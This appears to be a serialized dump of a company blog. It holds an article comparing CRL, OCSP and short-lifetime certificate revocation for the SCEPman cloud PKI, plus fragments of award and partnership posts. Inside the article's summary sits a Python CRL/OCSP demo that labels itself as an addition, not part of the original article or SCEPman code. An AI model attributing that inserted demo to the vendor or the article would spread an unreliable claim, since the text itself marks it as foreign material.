revokes a certificate immediately after the CA issues a CRL with two weeks validity. 
Then systems relying on this CRL may use the certificate for another two weeks after revocation.",[52,4530,4531],{},[2642,4532],{"src":4533,"alt":4534,"style":4535},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-scepman-crl.png","CRL Structure","width: 50%; margin-bottom: 50px;",[12,4537,4538],{},"A modern solution to ensure availability of the CDPs is a Content Delivery Network (CDN), for example, based on Azure Blob Storage. As a best practice for Microsoft CAs, a Scheduled Task regularly issues a new CRL and uploads it to Azure Blob Storage.",[12,4540,4541],{},"SCEPman has a stateless architecture: it has no database of its own for common operations. This has many advantages. It does not require backups. Multiple SCEPman instances run in parallel without any configuration; this enables automatic scale-out to serve during performance peaks. So statelessness is very good for cloud apps, but CRLs are not possible without a database to store the list of revoked certificates. SCEPman 2.4 dynamically generates a CRL for each request on the CDP. The CRL contains only manually revoked certificates, though, analogously to a classic PKI.",[12,4543,4544],{},"Luckily, there is a better alternative for a cloud PKI:",[186,4546,4548],{"id":4547},"online-certificate-status-protocol-ocsp","Online Certificate Status Protocol (OCSP)",[12,4550,4551,4556],{},[2672,4552,4555],{"href":4553,"rel":4554},"https://tools.ietf.org/html/rfc6960#section-2",[2676],"In 1999, OCSP was developed for high security applications"," for which the latency of CRLs was not acceptable. Instead of keeping a list of revoked certificates, a system can request the current status of a specific certificate from a so-called OCSP Responder. Thus, verifying the validity of a certificate in real-time requires only a comparably small HTTP request. 
The part of the OCSP response detailing the status of the requested certificate has the same ASN.1 data structure as a CRL entry: serial number, time of revocation, and revocation reason. Hence, there is no difference to CRLs here.",[52,4558,4559],{},[2642,4560],{"src":4561,"alt":4562,"style":4535},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-ocsp-response.png","OCSP Response",[52,4564,4566],{"style":4565},"margin-bottom: 50px;",[52,4567,424,4569,424,4573],{"style":4568},"background-color: var(--color-yellow); padding: 35px;",[186,4570,4572],{"id":4571},"why-neither-cdp-nor-ocsp-use-https","Why neither CDP nor OCSP use HTTPS",[12,4574,4575],{},"CRL requests from a CDP as well as OCSP requests commonly do not use TLS, i.e. HTTPS, but HTTP. Otherwise, a chicken-and-egg problem could occur, as the certificates used for the TLS connection require validation as well. Of course, the creators of CDPs and OCSP have taken this into account. CRLs as well as OCSP responses have cryptographic signatures from their CA or an accredited authority. This ensures authenticity of the revocation information even through insecure channels like HTTP.",[12,4577,4578],{},"The low latency of revocation information in OCSP comes with a price. If the OCSP Responders of a CA are down, it is no longer possible to check the validity of certificates -- which usually means that all issued certificates become unusable. Therefore, OCSP Responders should be designed for high availability.",[12,4580,4581],{},"In detail, there are some important differences between implementations. For example, Microsoft's OCSP servers use the CRL as their revocation database. This means that when an OCSP request comes in, the OCSP Responder searches for the certificate within the CRL and answers accordingly. Revoking a certificate at the CA does not automatically issue a new CRL, so the OCSP Responder will still claim that the certificate is valid as long as the CRL does. 
Using OCSP does not automatically give real-time revocation.",[12,4583,4584],{},"SCEPman uses OCSP to control certificate validity. The moment an OCSP request comes in, SCEPman searches for the corresponding object, a device or user, in the Azure AD or JAMF database and checks whether it matches the configured requirements. For example, if a computer object in AAD is disabled or deleted, its certificate becomes invalid immediately. This way, our users can revoke certificates without latency and even without the tedious certificate management required in traditional PKIs.",[12,4586,4587,4588,4593,4594,4599],{},"As pointed out in the last section, SCEPman is stateless -- we achieved this by using AAD and JAMF for certificate information instead of a separate database. This allows an easy high-availability installation of SCEPman, even with ",[2672,4589,4592],{"href":4590,"rel":4591},"https://docs.scepman.com/scepman-configuration/optional/geo-redundancy",[2676],"geo-redundancy",". Microsoft ",[2672,4595,4598],{"href":4596,"rel":4597},"https://azure.microsoft.com/en-us/support/legal/sla/app-service",[2676],"guarantees 99.95% uptime for their Azure App Services",", so even with a single instance, the VPN Gateway or WiFi NAC might fail more often than the OCSP Responder. While the high availability necessary for OCSP can be a blocker for on-premises PKIs, it is no problem when using SCEPman.",[12,4601,4602,4603,4608,4609,4614,4615,4620],{},"Even with SCEPman, some certificates are not linked to a directory object, or an administrator wants to revoke them independently of the directory object's state. 
Examples are ",[2672,4604,4607],{"href":4605,"rel":4606},"https://docs.scepman.com/certificate-deployment/static-certificates/mosyle",[2676],"certificate enrollment with Mosyle"," -- unless you ",[2672,4610,4613],{"href":4611,"rel":4612},"https://docs.scepman.com/advanced-configuration/application-settings/staticaad-validation",[2676],"link these certificates to AAD objects"," -- or ",[2672,4616,4619],{"href":4617,"rel":4618},"https://docs.scepman.com/certificate-deployment/certificate-master",[2676],"server certificates",". For these special cases, SCEPman uses a database, specifically an Azure Storage Account with Table Storage. SCEPman requires only read access to the database for OCSP; Table Storage is non-relational and, even in the cheapest SKU, stored three times redundantly, so replication and backups are not necessary. SCEPman uses the database as a source of revocation information in parallel to a possible MDM directory. If needed, SCEPman may still store issued certificates in the database to allow easy manual revocation in addition to automatic revocation.",[12,4622,4623],{},"The following diagram illustrates how OCSP works in a SCEPman setup on three distributed App Service instances:",[12,4625,4626],{},[2642,4627],{"alt":4628,"src":4629},"OCSP verification in a geo-redundant SCEPman setup","https://res.cloudinary.com/c4a8/image/upload/v1684157027/blog/pics/img-scepman-ocsp-structure-chart.png",[12,4631,4632,4633,4638,4639,4644,4645,4650],{},"When a client (which in this case need not be an end-user device, but possibly a RADIUS server like ",[2672,4634,4637],{"href":4635,"rel":4636},"https://www.radius-as-a-service.com/",[2676],"RADIUS-as-a-Service",") wants to check whether a certificate is still valid, it uses the DNS-based Azure Traffic Manager to find a healthy and nearby SCEPman instance and then sends the OCSP request to that instance. 
The chosen SCEPman instance queries both Azure Storage and, in this case, Intune in parallel to check whether the device object linked to the certificate is there and in a good state. The OCSP response reflects these results. A single Azure Storage instance suffices, as it is always redundant. The level of redundancy ",[2672,4640,4643],{"href":4641,"rel":4642},"https://learn.microsoft.com/en-us/azure/storage/common/storage-redundancy",[2676],"depends on the selected SKU",". Both Azure Key Vault and MEM/Intune are ",[2672,4646,4649],{"href":4647,"rel":4648},"https://learn.microsoft.com/en-us/azure/key-vault/general/disaster-recovery-guidance",[2676],"redundant without extra configuration",". The SCEPman instances do not communicate with each other and clients do not establish ongoing sessions with SCEPman instances for OCSP requests, so no cookies or the like are involved. Therefore, SCEPman instances can be added or removed as required.",[186,4652,4654],{"id":4653},"short-lifetime-certificates","Short Lifetime Certificates",[12,4656,4657],{},"In some applications, it is an advantage to have no revocation check at all: for example, systems without any network connection and therefore without access to a CDP or OCSP Responder, or systems where checking validity requires interaction with the certificate holder, so that only the holder, not the CA, can initiate the check. Attackers might still compromise these certificates, and the PKI must limit the damage by invalidating them.",[12,4659,4660],{},"These are cases for Short Lifetime Certificates: Certificates with a short validity period, only days or hours. It is not necessary to revoke these certificates, as a compromised certificate becomes invalid after a short time -- often faster than one revoked on a CRL.",[12,4662,4663],{},"The simpler architecture has further advantages: it requires no planning or operations for a CDP or OCSP Responder. 
Certificate usage does not require network connectivity. Management of these certificates can be cut down because of their low value.",[12,4665,4666,4667,4670],{},"A pitfall is that a PKI ",[3456,4668,4669],{},"should"," not manage these certificates. Because of their short validity, a CA issues many more of them than long-lived certificates. If Short Lifetime Certificates are stored in a database nevertheless, it quickly grows to a size it was not designed for. Microsoft's CA therefore offers a setting in certificate templates to not even store these certificates. Note that you have to set the compatibility level of the certificate template to Windows Server 2008 R2 or newer, which is not the default.",[12,4672,4673],{},"For WiFi and VPN client certificates, Short Lifetime Certificates are unsuited. Connecting to the network requires a valid certificate; in order to get a new certificate, the client needs a network connection. This is not a problem if the client renews its certificates long enough before their expiration. Microsoft Intune and JAMF in conjunction with SCEPman do this automatically. A traditional Microsoft CA with auto enrollment also supports this without user interaction. When using Short Lifetime Certificates, a machine slips into this vicious circle of missing network connection and missing certificate when its user is on vacation for a week and the device is turned off during this time.",[12,4675,4676,4681],{},[2672,4677,4680],{"href":4678,"rel":4679},"https://letsencrypt.org/2015/11/09/why-90-days.html",[2676],"Let's Encrypt issues TLS certificates with shorter lifetimes"," than common for other CAs. For servers, this is no issue, as they are always connected and use automated certificate issuance.",[12,4683,4684,4685,4690,4691,1013],{},"For the same reasons, SCEPman recommends Short Lifetime Certificates also only for servers. Starting with SCEPman v1.7, customers can configure the certificate validity per endpoint. 
Thus, they can use OCSP for client certificates with longer validity, while automatically issuing and renewing Short Lifetime ",[2672,4686,4689],{"href":4687,"rel":4688},"https://docs.scepman.com/certificate-deployment/other-1/domain-controller-certificates",[2676],"Domain Controller certificates",". Furthermore, we recommend short lifetimes for additional systems supplied with certificates via the ",[2672,4692,4695],{"href":4693,"rel":4694},"https://docs.scepman.com/certificate-deployment/other-1/static-certificates",[2676],"static SCEP endpoint",[186,4697,4699],{"id":4698},"summary","Summary",[12,4701,4702],{},"Each revocation method has advantages and disadvantages, so the choice depends on the context. For a traditional on-premises infrastructure PKI, CRLs are a good choice, because they are easy to implement. For a modern cloud PKI like SCEPman, OCSP is better because it allows revocations in real time and a cloud-friendly stateless implementation. Short Lifetime Certificates have more specialized use cases and can be mixed with CRLs or OCSP within a single PKI. Then, the choice depends on the type of certificate. 
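The CRL and OCSP behaviour compared above, as an added example that is not part of the original article and not SCEPman code: a throw-away CA issues one device certificate, publishes a CRL before and after revoking it, and answers OCSP requests from two backends, one that reads the last published CRL (the Microsoft behaviour described in the OCSP section) and one that reads the current directory state (the SCEPman behaviour). The relying-party checks verify the CA signature first, because both CRLs and OCSP responses travel over plain HTTP. It assumes the Python `cryptography` package (3.1 or newer); the CA name, the serial number 4711, the dates and the directory state are constructed for the demo.

```python
# Added example, not SCEPman code: one revocation decided via CRL and via OCSP
# with the `cryptography` package. Assumes cryptography >= 3.1.
import datetime as dt
import functools

from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.x509 import ocsp
from cryptography.x509.oid import NameOID

DER = serialization.Encoding.DER


def _name(cn):
    return x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, cn)])


def make_ca(now):
    # Throw-away CA for the demo; naive datetimes are interpreted as UTC.
    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    cert = (x509.CertificateBuilder().subject_name(_name('Demo CA'))
            .issuer_name(_name('Demo CA')).public_key(key.public_key())
            .serial_number(1).not_valid_before(now)
            .not_valid_after(now + dt.timedelta(days=3650))
            .add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=True)
            .sign(key, hashes.SHA256()))
    return key, cert


def issue_leaf(ca_key, ca_cert, serial, now, days):
    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    return (x509.CertificateBuilder().subject_name(_name('device-0815'))
            .issuer_name(ca_cert.subject).public_key(key.public_key())
            .serial_number(serial).not_valid_before(now)
            .not_valid_after(now + dt.timedelta(days=days))
            .sign(ca_key, hashes.SHA256()))


def build_crl(ca_key, ca_cert, revoked, this_update, next_update):
    # revoked maps serial -> revocation time; an empty dict yields an empty CRL.
    builder = (x509.CertificateRevocationListBuilder().issuer_name(ca_cert.subject)
               .last_update(this_update).next_update(next_update))
    for serial, when in revoked.items():
        builder = builder.add_revoked_certificate(
            x509.RevokedCertificateBuilder().serial_number(serial)
            .revocation_date(when).build())
    return builder.sign(ca_key, hashes.SHA256()).public_bytes(DER)


def _next_update(crl):
    # cryptography >= 42 exposes a tz-aware accessor; older versions a naive one.
    nu = getattr(crl, 'next_update_utc', None) or crl.next_update
    return nu.replace(tzinfo=None) if nu.tzinfo else nu


def check_with_crl(crl_der, ca_cert, serial, now):
    # Relying-party logic: trust only a CA-signed CRL that is still within its
    # validity window, then look the serial up in revokedCertificates.
    crl = x509.load_der_x509_crl(crl_der)
    if not crl.is_signature_valid(ca_cert.public_key()):
        return 'untrusted'
    if now > _next_update(crl):
        return 'stale'      # nextUpdate has passed: fetch a fresh CRL first
    hit = crl.get_revoked_certificate_by_serial_number(serial)
    return 'revoked' if hit is not None else 'good'


def ocsp_request(leaf, ca_cert):
    return (ocsp.OCSPRequestBuilder().add_certificate(leaf, ca_cert, hashes.SHA1())
            .build().public_bytes(DER))


def ocsp_responder(req_der, ca_key, ca_cert, leaf, revoked_serials, now):
    # Responder side. What counts as revoked depends on the backend: a CRL-backed
    # responder passes the serials found in the last CRL, a directory-backed one
    # the current directory state. Single-certificate demo: lookup by serial only.
    req = ocsp.load_der_ocsp_request(req_der)
    bad = req.serial_number in revoked_serials
    status = ocsp.OCSPCertStatus.REVOKED if bad else ocsp.OCSPCertStatus.GOOD
    resp = (ocsp.OCSPResponseBuilder().add_response(
                cert=leaf, issuer=ca_cert, algorithm=hashes.SHA1(), cert_status=status,
                this_update=now, next_update=now + dt.timedelta(minutes=5),
                revocation_time=now if bad else None,
                revocation_reason=x509.ReasonFlags.key_compromise if bad else None)
            .responder_id(ocsp.OCSPResponderEncoding.HASH, ca_cert)
            .sign(ca_key, hashes.SHA256()))
    return resp.public_bytes(DER)


def check_with_ocsp(resp_der, ca_cert, leaf):
    resp = ocsp.load_der_ocsp_response(resp_der)
    if resp.response_status != ocsp.OCSPResponseStatus.SUCCESSFUL:
        return 'unavailable'
    # The response arrived over plain HTTP; the CA signature is what we trust.
    ca_cert.public_key().verify(resp.signature, resp.tbs_response_bytes,
                                padding.PKCS1v15(), resp.signature_hash_algorithm)
    if resp.serial_number != leaf.serial_number:
        return 'mismatch'
    return {ocsp.OCSPCertStatus.GOOD: 'good',
            ocsp.OCSPCertStatus.REVOKED: 'revoked'}.get(resp.certificate_status, 'unknown')


@functools.lru_cache(maxsize=None)
def demo():
    t0 = dt.datetime(2023, 5, 1, 8, 0, 0)       # CRL #1 published (constructed)
    t_rev = t0 + dt.timedelta(days=1)           # key compromise, serial revoked at CA
    t_chk = t0 + dt.timedelta(days=2)           # a client checks the certificate
    ca_key, ca_cert = make_ca(t0)
    leaf = issue_leaf(ca_key, ca_cert, 4711, t0, 365)
    crl_old = build_crl(ca_key, ca_cert, {}, t0, t0 + dt.timedelta(days=14))
    crl_new = build_crl(ca_key, ca_cert, {4711: t_rev}, t_rev, t_rev + dt.timedelta(days=14))
    req = ocsp_request(leaf, ca_cert)
    crl_serials = {r.serial_number for r in x509.load_der_x509_crl(crl_old)}
    directory = {4711}                          # device object disabled at t_rev
    return {
        'cached_crl': check_with_crl(crl_old, ca_cert, 4711, t_chk),
        'fresh_crl': check_with_crl(crl_new, ca_cert, 4711, t_chk),
        'expired_crl': check_with_crl(crl_old, ca_cert, 4711, t0 + dt.timedelta(days=15)),
        'ocsp_crl_backed': check_with_ocsp(
            ocsp_responder(req, ca_key, ca_cert, leaf, crl_serials, t_chk), ca_cert, leaf),
        'ocsp_directory_backed': check_with_ocsp(
            ocsp_responder(req, ca_key, ca_cert, leaf, directory, t_chk), ca_cert, leaf),
    }


if __name__ == '__main__':
    for verdict, result in demo().items():
        print(verdict, '->', result)
```

Run directly, it prints five verdicts: `cached_crl` is good although the serial was revoked a day earlier (the CRL latency from the table), `ocsp_crl_backed` is good for the same reason, `ocsp_directory_backed` is revoked for the very same request, and `expired_crl` shows that a CRL past its nextUpdate yields no verdict at all. Real responders match a request by CertID (issuer hash plus serial) rather than by serial alone; the single-certificate demo shortcuts that.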
The following table summarizes some of the most important aspects of the three techniques:",[417,4704,420,4705],{},[438,4706,4707,420,4722,420,4738,420,4752,420,4765,420,4777],{},[426,4708,424,4710,424,4713,424,4716,424,4719,420],{"style":4709},"background-color: var(--color-black-30); border-bottom: 1px solid var(--color-black-50);",[430,4711],{"style":4712},"padding: 5px;",[430,4714,4715],{"style":4712},"CRL",[430,4717,4718],{"style":4712},"OCSP",[430,4720,4721],{"style":4712},"Short Lifetime",[426,4723,424,4725,424,4729,424,4732,424,4735,420],{"style":4724},"border-bottom: 1px solid var(--color-black-30);",[443,4726,4728],{"style":4727},"vertical-align: top; padding: 5px;","Latency",[443,4730,4731],{"style":4727},"Until next CRL update, typically 1-2 weeks at most",[443,4733,4734],{"style":4727},"0-3 minutes in good implementations",[443,4736,4737],{"style":4727},"Until natural expiration, typically 1-14 days",[426,4739,424,4740,424,4743,424,4746,424,4749,420],{"style":4724},[443,4741,4742],{"style":4727},"Required Availability",[443,4744,4745],{"style":4727},"Low",[443,4747,4748],{"style":4727},"High",[443,4750,4751],{"style":4727},"None",[426,4753,424,4754,424,4757,424,4760,424,4763,420],{"style":4724},[443,4755,4756],{"style":4727},"Architectural Complexity",[443,4758,4759],{"style":4727},"Medium (DB required)",[443,4761,4762],{"style":4727},"Medium to high if a DB is used, otherwise low",[443,4764,4751],{"style":4727},[426,4766,424,4767,424,4770,424,4773,424,4775,420],{"style":4724},[443,4768,4769],{"style":4727},"Revocation Reasons",[443,4771,4772],{"style":4727},"All",[443,4774,4772],{"style":4727},[443,4776,4751],{"style":4727},[426,4778,424,4779,424,4782,424,4785,424,4788,420],{"style":4724},[443,4780,4781],{"style":4727},"Temporary Revocations",[443,4783,4784],{"style":4727},"Yes, but often impractical because of the 
latency",[443,4786,4787],{"style":4727},"Yes",[443,4789,4790],{"style":4727},"No",[52,4792],{"style":4565},[12,4794,4795,4796,1013],{},"For Public CAs, Apple and Mozilla require CRLs, because OCSP introduces a privacy concern: each OCSP request tells the OCSP provider which domain is visited from which IP address. This is not a problem for private CAs like SCEPman, because the customer is the OCSP provider and also manages the clients to which SCEPman enrolls certificates, so it gains no additional information. Aaron Gable from Let's Encrypt has ",[2672,4797,4800],{"href":4798,"rel":4799},"https://letsencrypt.org/2022/09/07/new-life-for-crls.html",[2676],"summarized this and explained how Let's Encrypt deals with it",[186,4802,4804],{"id":4803},"the-special-case-of-aad-cba","The Special Case of AAD CBA",[12,4806,4807,4808,4813],{},"A special case is ",[2672,4809,4812],{"href":4810,"rel":4811},"https://learn.microsoft.com/en-us/azure/active-directory/authentication/concept-certificate-based-authentication",[2676],"Certificate-based authentication for Azure AD",", which recently reached General Availability. Microsoft has seemingly not used one of the common crypto libraries, all of which support OCSP as well as CRLs, but instead rewrote the cryptographic routines from scratch and implemented only CRL support. Additionally, they do not read the CDP from the certificate, but use one that is separately configured in the Azure Portal. This results in special requirements for this use case in terms of certificate revocation.",[12,4815,4816,4817,4822],{},"This is a case where you can configure ",[2672,4818,4821],{"href":4819,"rel":4820},"https://docs.scepman.com/advanced-configuration/application-settings/crl",[2676],"SCEPman's CDP"," in AAD. When AAD checks revocation, it will use the CRL. 
Other systems use the OCSP responder with its more up-to-date revocation information and better performance.",{"title":65,"searchDepth":111,"depth":111,"links":4824},[4825,4826,4827,4828,4829],{"id":4501,"depth":329,"text":4502},{"id":4547,"depth":329,"text":4548},{"id":4653,"depth":329,"text":4654},{"id":4698,"depth":329,"text":4699},{"id":4803,"depth":329,"text":4804},{"lang":2171,"titleClass":2173,"date":4831,"categories":4832,"blogtitlepic":4834,"socialimg":4835,"customExcerpt":4836,"keywords":4837,"hreflang":4838},"2023-05-15",[4833],"Products","head-scepman-revocation","/blog/heads/head-scepman-revocation.jpg","In a Public Key Infrastructure (PKI), it may happen that an issued certificate shall not be valid anymore. There are three techniques to solve this, each with their own advantages and disadvantages: CRLs, OCSP, and Short Lifetime Certificates. This article compares these techniques and illustrates them on the example of the architecture for our product SCEPman.","Certificates, revocations, public key infrastructure, PKI, CRLs, OCSP, short lifetime certificates, Certification Authority, CDPs, LDAP, HTTP, certificate validation, cache, failure, validity, certificate revocation, Content Delivery Network, CDN, Azure Blob Storage, stateless, database, availability, OCSP responder, real-time, ASN.1-. 
data structure, TLS, HTTPS, availability, deployments, Azure AD, JAMF database, Microsoft Endpoint Manager, Microsoft Intune, JAMF, network connectivity, Let's Encrypt, server certificates, on-premises, data protection, certificate-based authentication, Azure AD, CBA",[4839],{"lang":2260,"href":4840},"/blog/products/2023/05/certificate-revocation","/posts/2023-05-15-certificate-revocation",{"title":4494,"description":65},"posts/2023-05-15-certificate-revocation",[2176,4845,4833,4846],"SCEPman","Certificates","l8bYaidA1PoWKYTf3cw33V5u8FIm5SzMZaYPlPbDq4I",{"id":4849,"title":4850,"author":4851,"body":4852,"cta":2166,"description":4856,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":4879,"moment":4880,"navigation":2181,"path":4894,"seo":4895,"stem":4896,"tags":4897,"webcast":2168,"__hash__":4898},"content_en/posts/2023-06-28-partner-of-the-year-accelerate-trust.md","glueckkanja wins Accelerate Trust at the Partner of the Year Awards",[2461],{"type":9,"value":4853,"toc":4877},[4854,4857,4860,4863,4866,4868,4871,4874],[12,4855,4856],{},"As part of Microsoft's global Partner of the Year awards, the Accelerate award is presented to highlight special contributions to the national partner ecosystem. This ecosystem consists of over 30,000 players in Germany alone, including IT service providers, cloud providers, managed service providers, distributors, developers, support service providers and IT professionals of all kinds. The award is given to partners who stand out not only for their impressive sales figures and innovative strength, but also for their outstanding performance in the areas of sustainability, cyber security and corporate culture.",[12,4858,4859],{},"With the successful implementation and management of security platform solutions at leading German energy suppliers, glueckkanja has made a significant contribution to increasing IT security, which in turn has a positive impact on the overall security of supply in Germany. 
The comprehensive services provided by glueckkanja range from monitoring and incident response to training and support.",[12,4861,4862],{},"Due to these remarkable achievements, glueckkanja was not only the first European partner, but also one of the first three partners worldwide to be awarded the prestigious Microsoft Verified Managed Extended Detection and Response (MXDR) status. The company received additional recognition recently at the RSA conference in San Francisco. Here, the company was voted in the top 5 in the highly competitive Security MSSP of the Year category for the Microsoft Security Excellence Award 2023.",[12,4864,4865],{},"Now, glueckkanja continues its success story and also receives the coveted Partner of the Year Award 2023 in the Accelerate Trust category from Microsoft in Germany, further underlining the company's leading position in the industry.",[3817,4867],{":img":3819,":alt":3820,":cloudinary":3821,"img-src-sets":3822},[12,4869,4870],{},"Christian Kanja, CEO of glueckkanja AG, is pleased about the award and the associated recognition: \"Our comprehensive Managed Detection & Response (MDR) services ensure that overall IT security is continuously monitored and effective defence against cyber threats is guaranteed. We have won the trust and recognition of our customers through continuous efforts to make sustainable improvements. The award now presented by Microsoft impressively proves that we offer effective solutions for cyber security challenges. Microsoft has once again confirmed our determination to continue along the path we have chosen.\"",[12,4872,4873],{},"The Partner of the Year award is presented at Microsoft Inspire 2023. The global partner conference recognises companies from more than 100 countries that have demonstrated excellence in innovation and the development of customer solutions based on Microsoft technologies in a total of 58 categories. 
glueckkanja is one of these companies and once again shows that German IT companies are capable of scoring on the global stage.",[12,4875,4876],{},"Microsoft Inspire 2023 will take place from 18 to 20 July as a hybrid event. glueckkanja will be present as a Featured Partner with both an on-site stand in Munich and an online session. Another milestone in an exciting year for glueckkanja and proof of the company's top position and innovative strength.",{"title":65,"searchDepth":111,"depth":111,"links":4878},[],{"lang":2171,"titleClass":2173,"date":4880,"categories":4881,"blogtitlepic":4882,"socialimg":4883,"customExcerpt":4884,"keywords":4885,"quote":4886,"hreflang":4889},"2023-06-28",[2962],"head-poy-accelerate-trust","/blog/heads/head-poy-accelerate-trust.jpg","Microsoft has awarded glueckkanja the renowned Accelerate Trust as part of the Partner of the Year Awards. The company scored with the introduction and operation of security platform solutions at leading energy suppliers and makes an important contribution to IT security and thus to supply security in Germany with its services &quot;Made in Germany&quot;.","Accelerate Trust, Microsoft Germany, Partner of the Year, Revenue, Innovation, Sustainability, Cyber Security, Corporate Culture, Security Platform Solutions, Utilities, Microsoft Verified Managed Extended Detection and Response (MXDR) Status, Microsoft Security Excellence Award, Managed Detection & Response (MDR) Services, Microsoft Inspire Conference",{"img":4887,"alt":4888},"/blog/pics/quote-edith-wittmann-en.png","Edith 
Wittmann",[4890,4892],{"lang":2260,"href":4891},"/blog/corporate/award/poy/2023/06/partner-of-the-year-accelerate-trust",{"lang":2263,"href":4893},"/blog/corporate/award/poy/2023/06/test-es","/posts/2023-06-28-partner-of-the-year-accelerate-trust",{"title":4850,"description":4856},"posts/2023-06-28-partner-of-the-year-accelerate-trust",[2972,2973],"HtrC-PViTCPuBGEHod3Pa0QImfYATj4I5wVOQo8Ia9M",{"id":4900,"title":4901,"author":4902,"body":4903,"cta":2166,"description":4907,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":4939,"moment":4940,"navigation":2181,"path":4948,"seo":4949,"stem":4950,"tags":4951,"webcast":2168,"__hash__":4953},"content_en/posts/2023-08-09-inspire-2023-review.md","Inspire 2023 in Munich: New start, networking & innovation!",[2415],{"type":9,"value":4904,"toc":4937},[4905,4908,4928,4931,4934],[12,4906,4907],{},"The glueckkanja AG team was back at this year's Inspire2023 in Munich and we were very honoured to receive the Partner of the Year Accelerate Trust Award for our top security discipline - many thanks to Edith Wittmann and Michael Flügge. This award is not only a recognition of our outstanding services, but also a testament to our successful partnership with Microsoft.",[12,4909,4910,4911,805,4916,805,4919,2901,4923,4927],{},"For the first time, we presented ourselves to the Microsoft Partner Community as a product partner. All visitors were able to get a comprehensive overview of our M365 Companions with ",[2672,4912,4915],{"href":4913,"target":4914},"https://www.konnekt.io","_blank","CONNEKT",[2672,4917,4845],{"href":4918,"target":4914},"https://www.scepman.com",[2672,4920,4922],{"href":4921,"target":4914},"https://www.radius-as-a-service.com","RADIUSaaS",[2672,4924,4926],{"href":4925,"target":4914},"https://www.unified-contacts.com","Unified Contacts",". Special thanks go to Stefan Schönleber who, as our Product Marketing & Sales Lead, answered all questions and concerns. 
The team was very happy to have the support of Andreas Wach and to see Ebru Baumann and Cornelia Heyde again.",[12,4929,4930],{},"For FY24, Microsoft is focusing on AI, Azure Marketplace, EMEA and Corporate Accounts. We thank Lisa, Wael and Oliver for sharing and planning together to reach businesses more comprehensively and quickly with the full Microsoft technology and services stack. Together we have much to achieve!",[12,4932,4933],{},"We would also like to take this opportunity to thank our previous GPS team - Ulrich, Mathias and Chuanlin - for their commitment and look forward to working with Lejla and Kai.",[12,4935,4936],{},"All in all, Inspire 2023 in Munich was not only a place of inspiration and collaboration, but also the start of new partnerships and opportunities for the future. Here's to another successful year!",{"title":65,"searchDepth":111,"depth":111,"links":4938},[],{"lang":2171,"titleClass":2173,"date":4940,"categories":4941,"blogtitlepic":4942,"socialimg":4943,"customExcerpt":4944,"keywords":4945,"hreflang":4946},"2023-08-09",[2962],"head-inspire-2023-review","/blog/heads/head-inspire-2023-review.jpg","The glueckkanja team was once again present at this year's Inspire 2023 in Munich. 
Honoured with the Partner of the Year Accelerate Trust Award in the area of security and for the first time as a product partner of the Microsoft partner community, our cooperation with Microsoft continues to set new accents.","glueckkanja, Partner of the Year Accelerate Trust Award, Security, Edith Wittmann, Michael Flügge, Microsoft Partnership, Microsoft Partner Community, Product Partners, M365 Companions, KONNEKT, SCEPman, RADIUSaaS, Unified Contacts, Stefan Schönleber, Product Marketing & Sales Lead, Andreas Wach, Ebru Baumann, Cornelia Heyde, Fiscal Year 24, AI, Azure Marketplace, EMEA, Corporate Accounts, Microsoft Technology Stack, Microsoft Service Stack, GPS Team, Ulrich Keller, Mathias Klaas, Chualin Go, Lejla, Kai, Inspire 2023, Munich, Partnerships, Future",{"lang":2260,"href":4947},"/blog/corporate/microsoft/inspire/poy/2023/08/inspire-2023-review","/posts/2023-08-09-inspire-2023-review",{"title":4901,"description":4907},"posts/2023-08-09-inspire-2023-review",[2971,4319,2973,4952],"Inspire","rVx57jgFP1hHQmGyGkS67o9EepI5YifNVQoiQjI3Ils",{"id":4955,"title":4956,"author":4957,"body":4958,"cta":2166,"description":4962,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":4998,"moment":4999,"navigation":2181,"path":5010,"seo":5011,"stem":5012,"tags":5013,"webcast":2168,"__hash__":5015},"content_en/posts/2023-11-15-microsoft-security-copilot-partner.md","glueckkanja is among the first Microsoft Security Copilot partners",[2461],{"type":9,"value":4959,"toc":4995},[4960,4963,4966,4973,4976,4979,4983,4986,4989,4992],[12,4961,4962],{},"glueckkanja announces its exclusive participation in the Microsoft Security Copilot Partner Private Preview—a landmark recognition of its first-class expertise in Microsoft security technologies. 
Selected for its long-standing experience, innovative mindset, and close, trusted partnership with Microsoft, glueckkanja is at the forefront of exploring groundbreaking security features and providing significant feedback on future-oriented technologies.",[12,4964,4965],{},"\"AI is one of the most defining technologies of our era, holding the potential to achieve significant, fundamental advancements in cybersecurity,\" said Ann Johnson, Corporate Vice President, Microsoft Security Business Development. \"Security is a team sport, and we are thrilled to collaborate with our Security Copilot partner ecosystem to deliver solutions that strengthen cyber defense and make the promise of AI a reality.\"",[12,4967,4968,4969],{},"glueckkanja works with Microsoft product teams to shape the product development of Security Copilot in several areas, including validating and refining new and upcoming scenarios, providing feedback on product development and operations for future product releases, and validating and providing feedback on APIs to support the extensibility of Security Copilot. To learn more, ",[2672,4970,4972],{"href":4971,"target":4914},"https://aka.ms/IgniteFY24SecurityBlogPost","read the announcement.",[12,4974,4975],{},"\"Working with Security Copilot for an analyst is like wearing an exoskeleton. All their abilities and knowledge are suddenly and massively amplified. Dealing with complex contexts becomes easy and can be accomplished in unprecedented time. We at glueckkanja love Security Copilot,\" said Jan Geisbauer, Security Lead at glueckkanja AG.",[12,4977,4978],{},"Security Copilot is the first AI-powered security product that enables security professionals to quickly respond to threats, process signals at machine speed, and assess risk exposure within minutes. 
